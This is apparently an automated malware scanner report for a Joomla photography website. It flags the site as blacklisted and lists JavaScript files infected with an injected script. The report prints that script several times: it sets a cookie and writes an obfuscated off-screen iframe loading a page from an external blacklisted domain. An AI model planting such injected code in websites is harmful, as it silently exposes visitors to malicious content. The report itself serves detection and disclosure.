
Malware Scanner report for zorin-foto.ru

Malicious/Suspicious/Total urls checked
6/1/11
7 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "zorin-foto.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
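Malicious/Hidden/Total iFrames
0/0/0
(Note: this count apparently covers only iframes present in the page markup. The off-screen iframe written by the injected scripts through document.write is reported under "Scanned pages/files" below.)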
Deface / Content modification
OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=zorin-foto.ru

Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available at the Safe Browsing diagnostic URL given in the query above.

Scanned pages/files

Request | Server response | Status
http://zorin-foto.ru/
200 OK
Content-Length: 30907
Content-Type: text/html
clean
http://zorin-foto.ru/media/system/js/caption.js
200 OK
Content-Length: 4203
Content-Type: application/x-javascript
malicious
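Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar
The excerpt below shows a block placed ahead of the file's legitimate library code. It checks for a marker cookie and, when the cookie is absent, sets it (with the argument 86400, presumably a lifetime in seconds) and writes an iframe positioned off-screen (left:-1100px; top:-1100px) that loads a page from the blacklisted domain. The attribute names are split into concatenated string fragments, presumably to evade simple pattern matching. The same block appears in each file marked malicious in this report.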

...[1234 bytes skipped]...
okie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!uigentuse()) {
var cookie = getCookie('urgen7ryam9ole84kerl19nam');
if (cookie == undefined) {
setCookie('urgen7ryam9ole84kerl19nam', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>');
}
}
})();
var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = docu
...[1131 bytes skipped]...

Decoded script:


<iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe>

http://zorin-foto.ru/plugins/content/mavikthumbnails/slimbox/js/slimbox.js
200 OK
Content-Length: 9313
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar

...[1234 bytes skipped]...
okie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!uigentuse()) {
var cookie = getCookie('urgen7ryam9ole84kerl19nam');
if (cookie == undefined) {
setCookie('urgen7ryam9ole84kerl19nam', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>');
}
}
})();
var Lightbox = {
init: function(options){
this.options = $extend({
resizeDuration: 400,
resizeTransition: false, initialWidth: 250,
initialHeight: 250,
animateCaption: true,
showCounter: true
}, options || {});
this.anchors =
...[2216 bytes skipped]...

Decoded script:


<iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe>

http://zorin-foto.ru/modules/mod_vm_css_menu/js/vertical_flyout_right.js
404 Not Found
Content-Length: 20
Content-Type: text/html
clean
http://zorin-foto.ru/test404page.js
404 Not Found
Content-Length: 20
Content-Type: text/html
clean
http://zorin-foto.ru/templates/vsi39/script.js
200 OK
Content-Length: 16955
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar

...[1234 bytes skipped]...
okie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!uigentuse()) {
var cookie = getCookie('urgen7ryam9ole84kerl19nam');
if (cookie == undefined) {
setCookie('urgen7ryam9ole84kerl19nam', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>');
}
}
})();
if (window.addEvent) window.addEvent('domready', function() { });
var artEventHelper = {
'bind': function(obj, evt, fn) {
if (obj.addEventListener)
obj.addEventListener(evt, fn, false);
else if (obj.attachEvent)
obj.attachEvent('on' + evt, fn);

...[2211 bytes skipped]...

Decoded script:


<iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe>

http://zorin-foto.ru//mc.yandex.ru/metrika/watch.js/
404 Not Found
Content-Length: 307
Content-Type: text/html
clean
http://zorin-foto.ru/modules/mod_AutsonSlideShow/js/jquery-1.5.2.min.js
200 OK
Content-Length: 88165
Content-Type: application/x-javascript
suspicious
Page code contains blacklisted domain: fsdron.yosoydos.com.ar

//copyright
/**
* license GNU/GPL, see LICENSE.php
* Joomla! is free software. This version may have been modified pursuant
* to the GNU General Public License, and as distributed it includes or
* is derivative of works licensed under the GNU General Public License or
* other free or open source software licenses.
* See COPYRIGHT.php for copyright notices and details.
*/
/**
* JCaption javascript behavior
*

...[3803 bytes skipped]...

http://zorin-foto.ru/modules/mod_AutsonSlideShow/js/jquery.easing.1.3.js
200 OK
Content-Length: 10337
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar

...[1234 bytes skipped]...
okie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!uigentuse()) {
var cookie = getCookie('urgen7ryam9ole84kerl19nam');
if (cookie == undefined) {
setCookie('urgen7ryam9ole84kerl19nam', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>');
}
}
})();
jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend( jQuery.easing,
{
def: 'easeOutQuad',
swing: function (x, t, b, c, d) {
return jQuery.easing[jQuery.easing.def](x, t, b, c, d);
},
easeInQuad: function (x, t, b, c, d) {
return c*(
...[2242 bytes skipped]...

Decoded script:


<iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe>

http://zorin-foto.ru/modules/mod_AutsonSlideShow/js/jquery.animate-colors-min.js
200 OK
Content-Length: 3976
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar

...[1234 bytes skipped]...
okie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!uigentuse()) {
var cookie = getCookie('urgen7ryam9ole84kerl19nam');
if (cookie == undefined) {
setCookie('urgen7ryam9ole84kerl19nam', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>');
}
}
})();
(function(d){function i(){var b=d("script:first"),a=b.css("color"),c=false;if(/^rgba/.test(a))c=true;else try{c=a!=b.css("color","rgba(0, 0, 0, 0.5)").css("color");b.css("color",a)}catch(e){}return c}function g(b,a,c){var e="rgb"+(d.support.rgba?"a":"")+"("+parseInt(b[0]+c*(a[0]-b[0]),
...[1287 bytes skipped]...

Decoded script:


<iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe>

http://zorin-foto.ru/modules/mod_AutsonSlideShow/js/jquery.skitter.min.js
200 OK
Content-Length: 52419
Content-Type: application/x-javascript
malicious
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar

...[1234 bytes skipped]...
okie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!uigentuse()) {
var cookie = getCookie('urgen7ryam9ole84kerl19nam');
if (cookie == undefined) {
setCookie('urgen7ryam9ole84kerl19nam', true, 86400);
document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>');
}
}
})();

(function($){var number_skitter=0,skitters=[];$.fn.skitter=function(options){return this.each(function(){$(this).data('skitter_number',number_skitter);skitters.push(new $sk(this,options,number_skitter));++number_skitter})};var defaults={velocity:1,interval:2500,animats('transform
...[2036 bytes skipped]...

Decoded script:


<iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe>


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: zorin-foto.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 18:22:39 GMT
Server: nginx/1.1.19
Vary: Accept-Encoding
Content-Type: text/html; charset="utf-8"
X-Powered-By: PHP/5.3.10-1ubuntu3.13
Second query (visit from search engine):
GET / HTTP/1.1
Host: zorin-foto.ru
Referer: http://www.google.com/search?q=zorin-foto.ru

Result:
The result is similar to the first query. No suspicious redirects were found.